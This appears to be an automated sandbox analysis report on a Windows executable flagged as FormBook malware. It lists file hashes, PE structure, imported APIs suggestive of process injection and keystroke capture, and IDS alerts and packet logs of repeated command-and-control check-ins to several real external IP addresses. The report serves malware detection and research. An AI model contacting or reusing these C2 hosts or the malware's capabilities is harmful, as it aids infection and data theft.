                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.495256734524691
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:rP0n___87004354.exe
                                              File size:1'638'912 bytes
                                              MD5:c20955bf63ac83dcd469613d4b10504a
                                              SHA1:04613896a3d157769897706154223322988d17c1
                                              SHA256:b90c861586483b929fd0e015213742bad507395c206a9b4c338e28c075839854
                                              SHA512:3ad4be5c4af8cc26509a3141ff43271d0081cf7803d1fd1efc081b9b97daccdb7e9a38cac75cce5367244ca70c65c4f9fc1506539e3ace686b9163be544e0750
                                              SSDEEP:49152:qw80cTsjkWapjp5qDaZ0xAm1cEfCX24Bd4R5:P8sjk1POxAmjzCC
                                              TLSH:D875E02263DDC360CB669173BF6AB7017FBB38210A30B95B2F881D7DA950161166D7A3
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                              File Icon

                                              Icon Hash:aaf3e3e3938382a0

                                              Static PE Info

                                              General

                                              Entrypoint:0x427f4a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66EAB1DF [Wed Sep 18 10:56:31 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:afcdf79be1557326c854b6e20cb900a7

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FB2AC6F3CADh
                                              jmp 00007FB2AC6E6A74h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push edi
                                              push esi
                                              mov esi, dword ptr [esp+10h]
                                              mov ecx, dword ptr [esp+14h]
                                              mov edi, dword ptr [esp+0Ch]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007FB2AC6E6BFAh
                                              cmp edi, eax
                                              jc 00007FB2AC6E6F5Eh
                                              bt dword ptr [004C31FCh], 01h
                                              jnc 00007FB2AC6E6BF9h
                                              rep movsb
                                              jmp 00007FB2AC6E6F0Ch
                                              cmp ecx, 00000080h
                                              jc 00007FB2AC6E6DC4h
                                              mov eax, edi
                                              xor eax, esi
                                              test eax, 0000000Fh
                                              jne 00007FB2AC6E6C00h
                                              bt dword ptr [004BE324h], 01h
                                              jc 00007FB2AC6E70D0h
                                              bt dword ptr [004C31FCh], 00000000h
                                              jnc 00007FB2AC6E6D9Dh
                                              test edi, 00000003h
                                              jne 00007FB2AC6E6DAEh
                                              test esi, 00000003h
                                              jne 00007FB2AC6E6D8Dh
                                              bt edi, 02h
                                              jnc 00007FB2AC6E6BFFh
                                              mov eax, dword ptr [esi]
                                              sub ecx, 04h
                                              lea esi, dword ptr [esi+04h]
                                              mov dword ptr [edi], eax
                                              lea edi, dword ptr [edi+04h]
                                              bt edi, 03h
                                              jnc 00007FB2AC6E6C03h
                                              movq xmm1, qword ptr [esi]
                                              sub ecx, 08h
                                              lea esi, dword ptr [esi+08h]
                                              movq qword ptr [edi], xmm1
                                              lea edi, dword ptr [edi+08h]
                                              test esi, 00000007h
                                              je 00007FB2AC6E6C55h
                                              bt esi, 03h

                                              Rich Headers

                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000xc79e8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x18f0000x7130.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xc70000xc79e80xc7a00f4e099ee3cf4a58e8dd01871bc82d010False0.967372906230432data7.968405964004619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x18f0000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                              RT_RCDATA0xcf7b80xbecaddata1.000314785312578
                                              RT_GROUP_ICON0x18e4680x76dataEnglishGreat Britain0.6610169491525424
                                              RT_GROUP_ICON0x18e4e00x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x18e4f40x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0x18e5080x14dataEnglishGreat Britain1.25
                                              RT_VERSION0x18e51c0xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x18e5f80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                              Imports

                                              DLLImport
                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-25T12:46:29.988778+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973681.88.63.4680TCP
                                              2024-09-25T12:46:29.988778+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973681.88.63.4680TCP
                                              2024-09-25T12:46:46.637813+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449737217.70.184.5080TCP
                                              2024-09-25T12:46:49.260057+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449738217.70.184.5080TCP
                                              2024-09-25T12:46:51.747916+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449739217.70.184.5080TCP
                                              2024-09-25T12:46:54.950374+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449740217.70.184.5080TCP
                                              2024-09-25T12:46:54.950374+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449740217.70.184.5080TCP
                                              2024-09-25T12:47:00.696604+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449742172.96.187.6080TCP
                                              2024-09-25T12:47:03.240302+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449743172.96.187.6080TCP
                                              2024-09-25T12:47:05.798338+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449744172.96.187.6080TCP
                                              2024-09-25T12:47:08.338133+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449745172.96.187.6080TCP
                                              2024-09-25T12:47:08.338133+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449745172.96.187.6080TCP
                                              2024-09-25T12:47:13.838742+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497463.33.130.19080TCP
                                              2024-09-25T12:47:17.316782+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497473.33.130.19080TCP
                                              2024-09-25T12:47:20.010252+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497483.33.130.19080TCP
                                              2024-09-25T12:47:21.516611+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497493.33.130.19080TCP
                                              2024-09-25T12:47:21.516611+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497493.33.130.19080TCP
                                              2024-09-25T12:47:27.411768+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975067.223.117.18980TCP
                                              2024-09-25T12:47:29.890026+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975167.223.117.18980TCP
                                              2024-09-25T12:47:32.412218+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975267.223.117.18980TCP
                                              2024-09-25T12:47:34.943685+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44975367.223.117.18980TCP
                                              2024-09-25T12:47:34.943685+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975367.223.117.18980TCP
                                              2024-09-25T12:47:41.807158+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449754103.248.137.20980TCP
                                              2024-09-25T12:47:44.354366+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755103.248.137.20980TCP
                                              2024-09-25T12:47:46.904785+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756103.248.137.20980TCP
                                              2024-09-25T12:48:09.394601+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449757103.248.137.20980TCP
                                              2024-09-25T12:48:09.394601+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449757103.248.137.20980TCP
                                              2024-09-25T12:48:22.972850+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497583.33.130.19080TCP
                                              2024-09-25T12:48:25.532954+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497593.33.130.19080TCP
                                              2024-09-25T12:48:28.066243+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497603.33.130.19080TCP
                                              2024-09-25T12:48:30.640903+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497613.33.130.19080TCP
                                              2024-09-25T12:48:30.640903+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497613.33.130.19080TCP
                                              2024-09-25T12:48:37.387909+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497623.33.130.19080TCP
                                              2024-09-25T12:48:39.932241+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497633.33.130.19080TCP
                                              2024-09-25T12:48:41.416916+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497643.33.130.19080TCP
                                              2024-09-25T12:48:43.979967+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497653.33.130.19080TCP
                                              2024-09-25T12:48:43.979967+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497653.33.130.19080TCP
                                              2024-09-25T12:48:49.969654+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976685.153.138.11380TCP
                                              2024-09-25T12:48:52.523896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976785.153.138.11380TCP
                                              2024-09-25T12:48:55.215174+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976885.153.138.11380TCP
                                              2024-09-25T12:48:57.629655+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976985.153.138.11380TCP
                                              2024-09-25T12:48:57.629655+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976985.153.138.11380TCP
                                              2024-09-25T12:49:03.768976+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449770104.21.11.3180TCP
                                              2024-09-25T12:49:06.298093+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449771104.21.11.3180TCP
                                              2024-09-25T12:49:09.089476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449772104.21.11.3180TCP
                                              2024-09-25T12:49:11.931245+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449773104.21.11.3180TCP
                                              2024-09-25T12:49:11.931245+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449773104.21.11.3180TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 12:46:29.296824932 CEST4973680192.168.2.481.88.63.46
                                              Sep 25, 2024 12:46:29.301723003 CEST804973681.88.63.46192.168.2.4
                                              Sep 25, 2024 12:46:29.301840067 CEST4973680192.168.2.481.88.63.46
                                              Sep 25, 2024 12:46:29.308563948 CEST4973680192.168.2.481.88.63.46
                                              Sep 25, 2024 12:46:29.313462973 CEST804973681.88.63.46192.168.2.4
                                              Sep 25, 2024 12:46:29.988576889 CEST804973681.88.63.46192.168.2.4
                                              Sep 25, 2024 12:46:29.988640070 CEST804973681.88.63.46192.168.2.4
                                              Sep 25, 2024 12:46:29.988778114 CEST4973680192.168.2.481.88.63.46
                                              Sep 25, 2024 12:46:29.991929054 CEST4973680192.168.2.481.88.63.46
                                              Sep 25, 2024 12:46:29.996964931 CEST804973681.88.63.46192.168.2.4
                                              Sep 25, 2024 12:46:46.030462027 CEST4973780192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:46.035830021 CEST8049737217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:46.035914898 CEST4973780192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:46.048444986 CEST4973780192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:46.053349018 CEST8049737217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:46.637725115 CEST8049737217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:46.637742043 CEST8049737217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:46.637813091 CEST4973780192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:47.557025909 CEST4973780192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:48.575532913 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:48.580616951 CEST8049738217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:48.580754995 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:48.591730118 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:48.596513987 CEST8049738217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:49.215470076 CEST8049738217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:49.260056973 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:49.434498072 CEST8049738217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:49.434572935 CEST8049738217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:49.434640884 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:49.434642076 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:50.103879929 CEST4973880192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:51.122782946 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:51.128668070 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.128751993 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:51.139370918 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:51.144609928 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144625902 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144639969 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144649029 CEST8049739217.70.184.50192.168.2.4
